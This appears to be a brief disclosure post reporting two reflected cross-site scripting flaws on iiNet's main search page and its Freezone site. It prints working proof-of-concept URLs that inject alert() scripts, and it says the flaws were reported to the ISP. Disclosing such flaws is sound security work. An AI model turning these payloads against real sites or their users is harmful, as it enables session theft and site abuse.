iiNet, a major ISP in Australia seems to be a little less secure than they claim they are. After merely searching for XSS vulnerabilities on their website for 5 minutes, I had found these two vulnerabilities. Two non-persistent vulnerabilities, one surprisingly located in iiNet’s main search page.
Search page
Here is the main search page vulnerability:
Code:
http://www.iinet.net.au/search/?q=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&search=Search&scope=siteFreezone page
This is another vulnerability on the iiNet Freezone main page:
Code:
http://freezone.iinet.net.au/index/search?searchValue="><script>alert(String.fromCharCode(88, 83, 83))</script>&submit.x=22&submit.y=15I have reported the above vulnerabilities to iiNet and have gotten no response. Hopefully they will fix the vulnerabilities in the near future.